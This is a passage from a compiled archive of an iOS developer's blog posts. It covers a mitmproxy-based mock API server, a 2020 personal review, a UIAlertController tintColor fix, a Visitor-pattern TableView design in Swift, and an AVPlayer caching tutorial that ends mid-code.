mitmdump -m reverse:https://yourapihost.com -s mock.py --set record=true --set dumper_folder=loginFlow --set config_file=config.json
+
Enable Reverse Proxy Replay Mode:
1
+
mitmdump -m reverse:https://yourapihost.com -s mock.py --set dumper_folder=loginFlow --set config_file=config.json
+
And ensure that during testing, the API is switched to http://127.0.0.1:8080
1
+
mitmdump -m reverse:https://yourapihost.com -s mock.py --set record=true --set dumper_folder=addCart --set config_file=config.json
+
Using the Pinkoi iOS App as an example, test the following flow:
Launch App -> Home -> Scroll Down -> Similar to Wish List Items Section -> First Product -> Click First Product -> Enter Product Page -> Click Add to Cart -> UI Response Added to Cart -> Test Successful ✅
The method of UI automation operation was mentioned earlier, here we manually test the same flow to verify the results.
After the operation is completed, you can press ^ + C
to terminate the Snapshot API Mock Server and check the recording results in the file directory:
1
+
mitmdump -m reverse:https://yourapihost.com -s mock.py --set dumper_folder=addCart --set config_file=config.json
+
network_restricted
is set to False
by default, so it will directly return 404 without fetching data from the network)The proof of concept is successful. We can indeed use the Reverse Proxy Server to store API Requests & Responses and use it as a Mock API Server to respond with data to the App during testing 🎉🎉🎉.
This article only discusses the proof of concept. There are still many areas to be improved and more features to be implemented.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
#...
+ def response(self, flow):
+ setCookies = flow.response.headers.get_all("set-cookie")
+ # setCookies = ['ad=0; Domain=.xxx.com; expires=Wed, 23 Aug 2023 04:59:07 GMT; Max-Age=1800; Path=/', 'sessionid=xxxx; Secure; HttpOnly; Domain=.xxx.com; expires=Wed, 23 Aug 2023 04:59:07 GMT; Max-Age=1800; Path=/']
+
+ # OR Replace Cookie Domain From .xxx.com To 127.0.0.1
+ setCookies = [re.sub(r"\s*\.xxx\.com\s*", "127.0.0.1", s) for s in setCookies]
+
+ # AND Remove Security-Related Restrictions
+ setCookies = [re.sub(r";\s*Secure\s*", "", s) for s in setCookies]
+ setCookies = [re.sub(r";\s*HttpOnly;\s*", "", s) for s in setCookies]
+
+ flow.response.headers.set_all("Set-Cookie", setCookies)
+
+ #...
+
If you encounter issues with Cookies, such as the API responding with a Cookie but the App not receiving it, you can refer to the adjustments above.
During my 900+ days at Pinkoi, I realized many of my career aspirations and imaginations regarding iOS/App development and processes. I am grateful to all my teammates for walking through the pandemic and weathering the storms together; the courage to say goodbye is akin to the courage to pursue dreams and join the company initially.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
A very late review of 2020
Unrelated to work, 2020 was a difficult year for me; I went through many major setbacks, but fortunately, I got through them.
I just want to say one thing:
People should learn to cherish the present and appreciate what they have.
Back to work, in 2020 I stepped out of my comfort zone and entered a new environment; this exposed me to many new things and I absorbed a lot of essential knowledge in iOS and engineering development. Although the number of articles I produced in 2020 was not as high as before, and I even stopped updating for three to four months, the quality over quantity approach paid off. The articles I wrote in 2020, though fewer, performed better than before; I am gradually making progress!
Additionally, last year I also set up my personal website using Google Sites and will continue to sync new Medium articles there.
I am still the same person; I am very lazy. I don’t write articles just for the sake of writing. Each article is a process of recording insights that I have brewed over time. If I get lazy and don’t do it in one go, I probably won’t go back to write it (but this mostly happens with unimportant or uninteresting topics).
The downside is that sometimes I get too enthusiastic and write too quickly. Typos are minor, but if the content is incorrect or incomplete and misleads people, it’s a real sin Orz. So this year, when writing articles, I will research and address any issues I can think of, even if I didn’t use them in my initial project. If I can’t address them, I will leave a note to remind readers to pay attention to that aspect.
After installing, click “+” on Medium and then select the last option “<>”
The screen will split into two, and you can enter the code directly on the right:
After submitting, it will be embedded in the Medium article as a gist:
The advantage of embedding code with gist is that it supports syntax highlighting, making it easier for readers to read. The downside is that if you want to convert Medium to markdown format, the embedded code cannot be automatically converted and you have to manually Copy & Paste.
- Tried many conversion tools but none support gist extraction. If anyone knows, please share.
- Medium’s built-in code block still doesn’t support syntax highlighting, so this is the only way.
Daily traffic aggregation display, allowing you to see today’s traffic composition at a glance.
Additionally, it includes features for tracking new followers, claps, and more.
Besides continuing to write; I plan to find time to convert each article into Markdown format and upload them to Github for backup, in case Medium suddenly crashes one day… Currently, I am using Typora as the editor; it’s quite handy, and I’ll introduce it later!
The current progress is about 15% complete, because it’s quite boring, so I’m a bit lazy, haha.
Medium’s official backup download only backs up plain text, images are still linked externally and not downloaded; moreover, the code parts are embedded and cannot be directly displayed in Markdown.
It has already been deployed, please refer to “Medium Custom Domain Feature Returns”.
blog.zhgchg.li
because the main domain has other uses)However, I found that it affects Google SEO, so I’m still considering & testing whether to really use it.
Recently, I also activated the following services:
Anyway, I’m Idle
Finally, let’s have some statistics!
In 2020, a total of: 16 articles were published: 3 lifestyle + 2 unboxing + 11 technical articles
Thanks for everyone’s support and love in 2020, I will continue to work hard this year!
Your feedback is my motivation to write!
ZhgChgLi, 2021/02/24.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Issue with .tintColor setting failing when presenting UIAlertController on this page’s Image Assets (Render as template)
No lengthy explanations, let’s go straight to the comparison images.
Left Before Fix/Right After Fix
You can see that the ICON on the left loses its tintColor setting when UIAlertController is presented. Additionally, the color setting returns to normal once the presented window is closed.
First, let’s introduce the tintAdjustmentMode property. This property controls the display mode of tintColor and has three enumeration settings:
When presenting UIAlertController, it changes the tintAdjustmentMode of the Root ViewController’s view to Dimmed (so technically, the color setting doesn’t “fail”; it’s just that the tintAdjustmentMode mode changes).
But sometimes we want the ICON color to remain consistent, so we just need to keep the tintAdjustmentMode setting consistent in the UIView’s tintColorDidChange event:
1
+2
+3
+4
+5
+
extension UIButton {
+ override func tintColorDidChange() {
+ self.tintAdjustmentMode = .normal // Always keep normal
+ }
+}
+
extension example
It’s not a big issue, and it’s fine if you don’t change it, but it can be an eyesore.
Actually, every page that encounters presenting UIAlertController, action sheet, popover, etc., will change the view’s tintAdjustmentMode to gray, but I only noticed it on this page.
After searching for a while, I found out it was related to this property. Setting it resolved my small confusion.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Enhancing the readability and extensibility of TableView using the Visitor Pattern
Photo by Alex wong
Following the previous article on “Visitor Pattern in Swift” introducing the Visitor pattern and a simple practical application scenario, this article will discuss another practical application in iOS development.
Developing a dynamic wall feature where various types of blocks need to be dynamically combined and displayed.
Taking StreetVoice’s dynamic wall as an example:
As shown in the image above, the dynamic wall is composed of various types of blocks dynamically combined, including:
More types are expected to be added in the future with iterative functionality.
Without any architectural design, the code may look like this:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
+ let row = datas[indexPath.row]
+ switch row.type {
+ case .invitation:
+ let cell = tableView.dequeueReusableCell(withIdentifier: "invitation", for: indexPath) as! InvitationCell
+ // config cell with viewObject/viewModel...
+ return cell
+ case .newSong:
+ let cell = tableView.dequeueReusableCell(withIdentifier: "newSong", for: indexPath) as! NewSongCell
+ // config cell with viewObject/viewModel...
+ return cell
+ case .newEvent:
+ let cell = tableView.dequeueReusableCell(withIdentifier: "newEvent", for: indexPath) as! NewEventCell
+ // config cell with viewObject/viewModel...
+ return cell
+ case .newText:
+ let cell = tableView.dequeueReusableCell(withIdentifier: "newText", for: indexPath) as! NewTextCell
+ // config cell with viewObject/viewModel...
+ return cell
+ case .newPhotos:
+ let cell = tableView.dequeueReusableCell(withIdentifier: "newPhotos", for: indexPath) as! NewPhotosCell
+ // config cell with viewObject/viewModel...
+ return cell
+ }
+}
+
+func tableView(_ tableView: UITableView, heightForRowAt indexPath: IndexPath) -> CGFloat {
+ let row = datas[indexPath.row]
+ switch row.type {
+ case .invitation:
+ if row.isEmpty {
+ return 100
+ } else {
+ return 300
+ }
+ case .newSong:
+ return 100
+ case .newEvent:
+ return 200
+ case .newText:
+ return UITableView.automaticDimension
+ case .newPhotos:
+ return UITableView.automaticDimension
+ }
+}
+
Organized the object relationships as shown in the figure below:
We have many types of DataSource (ViewObject) that need to interact with multiple types of operators, which is a very typical Visitor Double Dispatch.
To simplify the Demo Code, we will use PlainTextFeedViewObject
for plain text feed, MemoriesFeedViewObject
for daily memories, and MediaFeedViewObject
for image feed to demonstrate the design.
1
+2
+3
+4
+5
+6
+7
+
protocol FeedVisitor {
+ associatedtype T
+ func visit(_ viewObject: PlainTextFeedViewObject) -> T?
+ func visit(_ viewObject: MediaFeedViewObject) -> T?
+ func visit(_ viewObject: MemoriesFeedViewObject) -> T?
+ //...
+}
+
Implement the FeedVisitor
interface for each operator:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
struct FeedCellVisitor: FeedVisitor {
+ typealias T = UITableViewCell.Type
+
+ func visit(_ viewObject: MediaFeedViewObject) -> T? {
+ return MediaFeedTableViewCell.self
+ }
+
+ func visit(_ viewObject: MemoriesFeedViewObject) -> T? {
+ return MemoriesFeedTableViewCell.self
+ }
+
+ func visit(_ viewObject: PlainTextFeedViewObject) -> T? {
+ return PlainTextFeedTableViewCell.self
+ }
+}
+
Implement the mapping between ViewObject <-> UITableViewCell.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
struct FeedCellHeightVisitor: FeedVisitor {
+ typealias T = CGFloat
+
+ func visit(_ viewObject: MediaFeedViewObject) -> T? {
+ return 30
+ }
+
+ func visit(_ viewObject: MemoriesFeedViewObject) -> T? {
+ return 10
+ }
+
+ func visit(_ viewObject: PlainTextFeedViewObject) -> T? {
+ return 10
+ }
+}
+
Implement the mapping between ViewObject <-> UITableViewCell Height.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+
struct FeedCellConfiguratorVisitor: FeedVisitor {
+
+ private let cell: UITableViewCell
+
+ init(cell: UITableViewCell) {
+ self.cell = cell
+ }
+
+ func visit(_ viewObject: MediaFeedViewObject) -> Any? {
+ guard let cell = cell as? MediaFeedTableViewCell else { return nil }
+ // cell.config(viewObject)
+ return nil
+ }
+
+ func visit(_ viewObject: MemoriesFeedViewObject) -> Any? {
+ guard let cell = cell as? MediaFeedTableViewCell else { return nil }
+ // cell.config(viewObject)
+ return nil
+ }
+
+ func visit(_ viewObject: PlainTextFeedViewObject) -> Any? {
+ guard let cell = cell as? MediaFeedTableViewCell else { return nil }
+ // cell.config(viewObject)
+ return nil
+ }
+}
+
Implement ViewObject <-> Cell how to Config mapping.
When you need to support a new DataSource (ViewObject), just add a new method in the FeedVisitor interface, and implement the corresponding logic in each operator.
DataSource (ViewObject) binding with operators:
1
+2
+3
+
protocol FeedViewObject {
+ @discardableResult func accept<V: FeedVisitor>(visitor: V) -> V.T?
+}
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
struct PlainTextFeedViewObject: FeedViewObject {
+ func accept<V>(visitor: V) -> V.T? where V : FeedVisitor {
+ return visitor.visit(self)
+ }
+}
+struct MemoriesFeedViewObject: FeedViewObject {
+ func accept<V>(visitor: V) -> V.T? where V : FeedVisitor {
+ return visitor.visit(self)
+ }
+}
+
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+
final class ViewController: UIViewController {
+
+ @IBOutlet weak var tableView: UITableView!
+
+ private let cellVisitor = FeedCellVisitor()
+
+ private var viewObjects: [FeedViewObject] = [] {
+ didSet {
+ viewObjects.forEach { viewObject in
+ let cellName = viewObject.accept(visitor: cellVisitor)
+ tableView.register(cellName, forCellReuseIdentifier: String(describing: cellName))
+ }
+ }
+ }
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ tableView.delegate = self
+ tableView.dataSource = self
+
+ viewObjects = [
+ MemoriesFeedViewObject(),
+ MediaFeedViewObject(),
+ PlainTextFeedViewObject(),
+ MediaFeedViewObject(),
+ PlainTextFeedViewObject(),
+ MediaFeedViewObject(),
+ PlainTextFeedViewObject()
+ ]
+ // Do any additional setup after loading the view.
+ }
+}
+
+extension ViewController: UITableViewDataSource {
+ func numberOfSections(in tableView: UITableView) -> Int {
+ return 1
+ }
+
+ func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
+ return viewObjects.count
+ }
+
+ func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
+ let viewObject = viewObjects[indexPath.row]
+ let cellName = viewObject.accept(visitor: cellVisitor)
+
+ let cell = tableView.dequeueReusableCell(withIdentifier: String(describing: cellName), for: indexPath)
+ let cellConfiguratorVisitor = FeedCellConfiguratorVisitor(cell: cell)
+ viewObject.accept(visitor: cellConfiguratorVisitor)
+ return cell
+ }
+}
+
+extension ViewController: UITableViewDelegate {
+ func tableView(_ tableView: UITableView, heightForRowAt indexPath: IndexPath) -> CGFloat {
+ let viewObject = viewObjects[indexPath.row]
+ let cellHeightVisitor = FeedCellHeightVisitor()
+ let cellHeight = viewObject.accept(visitor: cellHeightVisitor) ?? UITableView.automaticDimension
+ return cellHeight
+ }
+}
+
Article written during the low period of thinking in July 2022. If there are any inadequacies or errors in the content, please forgive me!
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
AVPlayer/AVQueuePlayer with AVURLAsset implementing AVAssetResourceLoaderDelegate
Photo by Tyler Lastovich
I have open-sourced my previous implementation, and those in need can use it directly.
It’s been more than half a year since the last post “Exploring Methods for Implementing iOS HLS Cache”, and the team has always wanted to implement the cache-while-playing feature because it greatly impacts costs. We are a music streaming platform, and if we have to fetch the entire file every time the same song is played, it would be a huge data drain for us and for users who don’t have unlimited data plans. Although music files are at most a few MB, it all adds up to significant costs!
Additionally, since the Android side has already implemented the cache-while-playing feature, we previously compared the costs and found that after launching on Android, there was a significant reduction in data usage. With relatively more users on iOS, we should see even better data savings.
Based on the experience from the previous post, if we continue to use HLS (.m3u8/.ts) to achieve our goal, things will become very complicated and possibly unachievable. So, we decided to revert to using mp3 files, which allows us to directly use AVAssetResourceLoaderDelegate
for implementation.
First, we need to understand how data is requested from the server when playing videos or music. Generally, video and music files are very large, and it is not feasible to wait until the entire file is fetched before starting playback. The common approach is to fetch data as it plays, only needing the data for the currently playing segment.
The way to achieve this is through HTTP/1.1 Range, which only returns the specified byte range of data, for example, specifying 0–100 will only return the 100 bytes of data from 0–100. Using this method, data can be fetched in segments and then assembled into a complete file. This method can also be applied to resume interrupted downloads.
We will first use HEAD to check the Response Header to understand if the server supports Range requests, the total length of the resource, and the file type:
1
+
curl -i -X HEAD http://zhgchg.li/music.mp3
+
Using HEAD, we can get the following information from the Response Header:
However, sometimes we also use GET Range: bytes=0–1
, which means we request data in the range of 0–1, but we don’t actually care about the content of 0–1. We just want to see the Response Header information; the native AVPlayer uses GET to check, so this article will also use it.
But it is more recommended to use HEAD to check. One method is more correct, and if the server does not support the Range function, using GET will force the download of the entire file.
1
+
curl -i -X GET http://zhgchg.li/music.mp3 -H "Range: bytes=0–1"
+
Using GET, we can get the following information from the Response Header:
Knowing that the server supports Range requests, we can initiate segmented Range requests:
1
+
curl -i -X GET http://zhgchg.li/music.mp3 -H "Range: bytes=0–100"
+
The server will return 206 Partial Content:
1
+2
+3
+4
+
Content-Range: bytes 0-100/total length
+Content-Length: 100
+...
+(binary content)
+
At this point, we get the data for Range 0–100 and can continue to make new requests for Range 100–200, 200–300, and so on until the end.
If the requested Range exceeds the total length of the resource, it will return 416 Range Not Satisfiable.
Additionally, to get the complete file data, you can request Range 0-total length or use 0-:
1
+
curl -i -X GET http://zhgchg.li/music.mp3 -H "Range: bytes=0–"
+
You can also request multiple Range data in the same request and set conditions, but we don’t need that. For more details, you can refer here.
HTTP 1.1 is enabled by default. This feature allows real-time retrieval of downloaded data, for example, a 5 MB file can be retrieved in 16 KB, 16 KB, 16 KB… increments, without waiting for the entire 5 MB to be downloaded.
1
+
Connection: Keep-Alive
+
Then there’s no need to do so much. Just use URLSession to download the mp3 file and feed it to the player… But this is not the result we want, so you can ask the backend to modify the server settings.
When we use AVURLAsset to initialize with a URL resource and assign it to AVPlayer/AVQueuePlayer to start playing, as mentioned above, it will first use GET Range 0–1 to obtain whether it supports Range requests, the total length of the resource, and the file type.
With the file information, a second request will be initiated to request data from 0 to the total length.
⚠️ AVPlayer will request data from 0 to the total length and will cancel the network request once it feels it has enough data (e.g., 16 kb, 16 kb, 16 kb…) (so it won’t actually fetch the entire file unless the file is very small).
It will continue to request data using Range after resuming playback.
(This part is different from what I previously thought; I assumed it would request 0–100, 100–200, etc.)
AVPlayer Request Example:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+
1. GET Range 0-1 => Response: Total length 150000 / public.mp3 / true
+2. GET 0-150000...
+3. 16 kb receive
+4. 16 kb receive...
+5. cancel() // current offset is 700
+6. Continue playback
+7. GET 700-150000...
+8. 16 kb receive
+9. 16 kb receive...
+10. cancel() // current offset is 1500
+11. Continue playback
+12. GET 1500-150000...
+13. 16 kb receive
+14. 16 kb receive...
+16. If seek to...5000
+17. cancel(12.) // current offset is 2000
+18. GET 5000-150000...
+19. 16 kb receive
+20. 16 kb receive...
+...
+
⚠️ In iOS ≤12, it will first send a few shorter requests to test (?), and then send a request for the total length; in iOS ≥ 13, it will directly send a request for the total length.
Another side issue is that while observing how resources are fetched, I used the mitmproxy tool for sniffing. It showed errors, waiting for the entire response to come back before displaying it, instead of showing segments and using persistent connections for continued downloads. This scared me! I thought iOS was dumb enough to fetch the entire file each time! Next time, I need to be a bit skeptical when using tools Orz.
⚠️ Switching to the next resource in AVQueuePlayer or changing the playback resource in AVPlayer will not initiate a Cancel request for the previous track.
It also calls the Resource Loader to handle it, but the requested data range will be smaller.
With the above preliminary knowledge, let’s look at how to implement the local cache function of AVPlayer.
As mentioned earlier, AVAssetResourceLoaderDelegate
allows us to implement the Resource Loader for the Asset.
The Resource Loader is essentially a worker. Whether the player needs file information or file data, and the range, it tells us, and we do it.
I saw an example where a Resource Loader serves all AVURLAssets, which I think is wrong. It should be one Resource Loader serving one AVURLAsset, following the lifecycle of the AVURLAsset, as it belongs to the AVURLAsset.
A Resource Loader serving all AVURLAssets in AVQueuePlayer would become very complex and difficult to manage.
Note that implementing your own Resource Loader doesn’t mean it will handle everything. It will only use your Resource Loader when the system cannot recognize or handle the resource.
Therefore, before giving the URL resource to AVURLAsset, we need to change the Scheme to our custom Scheme, not http/https… which the system can handle.
1
+
http://zhgchg.li/music.mp3 => cacheable://zhgchg.li/music.mp3
+
AVAssetResourceLoaderDelegate
Only two methods need to be implemented:
This method asks us if we can handle this resource. Return true if we can, return false if we cannot (unsupported URL).
We can extract what is being requested from loadingRequest
(whether it is the first request for file information or a data request, and if it is a data request, what the Range is). After knowing the request, we initiate our own request to fetch the data. Here we can decide whether to initiate a URLSession or return Data from local storage.
Additionally, we can perform Data encryption and decryption operations here to protect the original data.
As mentioned earlier, Cancel initiation timing when Cancel is initiated…
We can cancel the ongoing URLSession request here.
For the Cache part, I directly use PINCache, delegating the Cache work to it, avoiding issues like Cache read/write DeadLock and implementing Cache LRU strategy.
️️⚠️️️️️️️️️️️OOM Warning!
Since this is for caching music files with a size of around 10 MB, PINCache can be used as a local Cache tool. However, this method cannot be used for serving videos (which may require loading several GB of data into memory at once).
For such requirements, you can refer to the approach of using FileHandle’s seek read/write features.
Without further ado, here is the complete project:
Local Cache data object mapping implements NSCoding, as PINCache relies on the archivedData method for encoding/decoding.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+
import Foundation
+import CryptoKit
+
+class AssetDataContentInformation: NSObject, NSCoding {
+ @objc var contentLength: Int64 = 0
+ @objc var contentType: String = ""
+ @objc var isByteRangeAccessSupported: Bool = false
+
+ func encode(with coder: NSCoder) {
+ coder.encode(self.contentLength, forKey: #keyPath(AssetDataContentInformation.contentLength))
+ coder.encode(self.contentType, forKey: #keyPath(AssetDataContentInformation.contentType))
+ coder.encode(self.isByteRangeAccessSupported, forKey: #keyPath(AssetDataContentInformation.isByteRangeAccessSupported))
+ }
+
+ override init() {
+ super.init()
+ }
+
+ required init?(coder: NSCoder) {
+ super.init()
+ self.contentLength = coder.decodeInt64(forKey: #keyPath(AssetDataContentInformation.contentLength))
+ self.contentType = coder.decodeObject(forKey: #keyPath(AssetDataContentInformation.contentType)) as? String ?? ""
+ self.isByteRangeAccessSupported = coder.decodeObject(forKey: #keyPath(AssetDataContentInformation.isByteRangeAccessSupported)) as? Bool ?? false
+ }
+}
+
+class AssetData: NSObject, NSCoding {
+ @objc var contentInformation: AssetDataContentInformation = AssetDataContentInformation()
+ @objc var mediaData: Data = Data()
+
+ override init() {
+ super.init()
+ }
+
+ func encode(with coder: NSCoder) {
+ coder.encode(self.contentInformation, forKey: #keyPath(AssetData.contentInformation))
+ coder.encode(self.mediaData, forKey: #keyPath(AssetData.mediaData))
+ }
+
+ required init?(coder: NSCoder) {
+ super.init()
+ self.contentInformation = coder.decodeObject(forKey: #keyPath(AssetData.contentInformation)) as? AssetDataContentInformation ?? AssetDataContentInformation()
+ self.mediaData = coder.decodeObject(forKey: #keyPath(AssetData.mediaData)) as? Data ?? Data()
+ }
+}
+
AssetData
contains:
contentInformation
: AssetDataContentInformation AssetDataContentInformation
: Contains whether Range requests are supported (isByteRangeAccessSupported), total resource length (contentLength), file type (contentType)mediaData
: Original audio Data (large files here may cause OOM)Encapsulates the logic for storing and retrieving Data in PINCache.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+
import PINCache
+import Foundation
+
+protocol AssetDataManager: NSObject {
+ func retrieveAssetData() -> AssetData?
+ func saveContentInformation(_ contentInformation: AssetDataContentInformation)
+ func saveDownloadedData(_ data: Data, offset: Int)
+ func mergeDownloadedDataIfIsContinuted(from: Data, with: Data, offset: Int) -> Data?
+}
+
+extension AssetDataManager {
+ func mergeDownloadedDataIfIsContinuted(from: Data, with: Data, offset: Int) -> Data? {
+ if offset <= from.count && (offset + with.count) > from.count {
+ let start = from.count - offset
+ var data = from
+ data.append(with.subdata(in: start..<with.count))
+ return data
+ }
+ return nil
+ }
+}
+
+//
+
+class PINCacheAssetDataManager: NSObject, AssetDataManager {
+
+ static let Cache: PINCache = PINCache(name: "ResourceLoader")
+ let cacheKey: String
+
+ init(cacheKey: String) {
+ self.cacheKey = cacheKey
+ super.init()
+ }
+
+ func saveContentInformation(_ contentInformation: AssetDataContentInformation) {
+ let assetData = AssetData()
+ assetData.contentInformation = contentInformation
+ PINCacheAssetDataManager.Cache.setObjectAsync(assetData, forKey: cacheKey, completion: nil)
+ }
+
+ func saveDownloadedData(_ data: Data, offset: Int) {
+ guard let assetData = self.retrieveAssetData() else {
+ return
+ }
+
+ if let mediaData = self.mergeDownloadedDataIfIsContinuted(from: assetData.mediaData, with: data, offset: offset) {
+ assetData.mediaData = mediaData
+
+ PINCacheAssetDataManager.Cache.setObjectAsync(assetData, forKey: cacheKey, completion: nil)
+ }
+ }
+
+ func retrieveAssetData() -> AssetData? {
+ guard let assetData = PINCacheAssetDataManager.Cache.object(forKey: cacheKey) as? AssetData else {
+ return nil
+ }
+ return assetData
+ }
+}
+
Here, we extract the Protocol because we might use other storage methods to replace PINCache in the future. Therefore, other programs should rely on the Protocol rather than the Class instance when using it.
⚠️
mergeDownloadedDataIfIsContinuted
This method is extremely important.
For linear playback, you just need to keep appending new Data to the Cache Data, but the real situation is much more complicated. The user might play Range 0~100 and then directly Seek to Range 200–500 for playback. How to merge the existing 0-100 Data with the new 200–500 Data is a big problem.
⚠️ Data merging issues can lead to terrible playback glitches…
The answer here is, we do not handle non-continuous data; because our project is only for audio, and the files are just a few MB (≤ 10MB), considering the development cost, we didn’t do it. I only handle merging continuous data (for example, currently having 0~100, and the new data is 75~200, after merging it becomes 0~200; if the new data is 150~200, I will ignore it and not merge).
If you want to consider non-continuous merging, besides using other methods for storage (to identify the missing parts), you also need to be able to query which segment needs a network request and which segment is taken locally during the Request. Considering this situation, the implementation will be very complicated.
Image source: iOS AVPlayer Video Cache Design and Implementation
AVURLAsset weakly holds the ResourceLoader Delegate, so it is recommended to create an AVURLAsset Class that inherits from AVURLAsset, internally create, assign, and hold the ResourceLoader, allowing it to follow the lifecycle of AVURLAsset. Additionally, you can store information such as the original URL, CacheKey, etc.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+
class CachingAVURLAsset: AVURLAsset {
+ static let customScheme = "cacheable"
+ let originalURL: URL
+ private var _resourceLoader: ResourceLoader?
+
+ var cacheKey: String {
+ return self.url.lastPathComponent
+ }
+
+ static func isSchemeSupport(_ url: URL) -> Bool {
+ guard let components = URLComponents(url: url, resolvingAgainstBaseURL: false) else {
+ return false
+ }
+
+ return ["http", "https"].contains(components.scheme)
+ }
+
+ override init(url URL: URL, options: [String: Any]? = nil) {
+ self.originalURL = URL
+
+ guard var components = URLComponents(url: URL, resolvingAgainstBaseURL: false) else {
+ super.init(url: URL, options: options)
+ return
+ }
+
+ components.scheme = CachingAVURLAsset.customScheme
+ guard let url = components.url else {
+ super.init(url: URL, options: options)
+ return
+ }
+
+ super.init(url: url, options: options)
+
+ let resourceLoader = ResourceLoader(asset: self)
+ self.resourceLoader.setDelegate(resourceLoader, queue: resourceLoader.loaderQueue)
+ self._resourceLoader = resourceLoader
+ }
+}
+
Usage:
1
+2
+3
+4
+5
+
if CachingAVURLAsset.isSchemeSupport(url) {
+ let asset = CachingAVURLAsset(url: url)
+ let avplayer = AVPlayer(asset)
+ avplayer.play()
+}
+
Where isSchemeSupport()
is used to determine if the URL supports our Resource Loader (excluding file://).
originalURL
stores the original resource URL.
cacheKey
stores the Cache Key for this resource, here we directly use the file name as the Cache Key.
Please adjust cacheKey
according to real-world scenarios. If the file name is not hashed and may be duplicated, it is recommended to hash it first to avoid collisions; if you want to hash the entire URL as the key, also pay attention to whether the URL will change (e.g., using CDN).
Hashing can use md5…sha… iOS ≥ 13 can directly use Apple’s CryptoKit, for others, check Github!
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+
import Foundation
+import CoreServices
+
+protocol ResourceLoaderRequestDelegate: AnyObject {
+ func dataRequestDidReceive(_ resourceLoaderRequest: ResourceLoaderRequest, _ data: Data)
+ func dataRequestDidComplete(_ resourceLoaderRequest: ResourceLoaderRequest, _ error: Error?, _ downloadedData: Data)
+ func contentInformationDidComplete(_ resourceLoaderRequest: ResourceLoaderRequest, _ result: Result<AssetDataContentInformation, Error>)
+}
+
+class ResourceLoaderRequest: NSObject, URLSessionDataDelegate {
+ struct RequestRange {
+ var start: Int64
+ var end: RequestRangeEnd
+
+ enum RequestRangeEnd {
+ case requestTo(Int64)
+ case requestToEnd
+ }
+ }
+
+ enum RequestType {
+ case contentInformation
+ case dataRequest
+ }
+
+ struct ResponseUnExpectedError: Error { }
+
+ private let loaderQueue: DispatchQueue
+
+ let originalURL: URL
+ let type: RequestType
+
+ private var session: URLSession?
+ private var dataTask: URLSessionDataTask?
+ private var assetDataManager: AssetDataManager?
+
+ private(set) var requestRange: RequestRange?
+ private(set) var response: URLResponse?
+ private(set) var downloadedData: Data = Data()
+
+ private(set) var isCancelled: Bool = false {
+ didSet {
+ if isCancelled {
+ self.dataTask?.cancel()
+ self.session?.invalidateAndCancel()
+ }
+ }
+ }
+ private(set) var isFinished: Bool = false {
+ didSet {
+ if isFinished {
+ self.session?.finishTasksAndInvalidate()
+ }
+ }
+ }
+
+ weak var delegate: ResourceLoaderRequestDelegate?
+
+ init(originalURL: URL, type: RequestType, loaderQueue: DispatchQueue, assetDataManager: AssetDataManager?) {
+ self.originalURL = originalURL
+ self.type = type
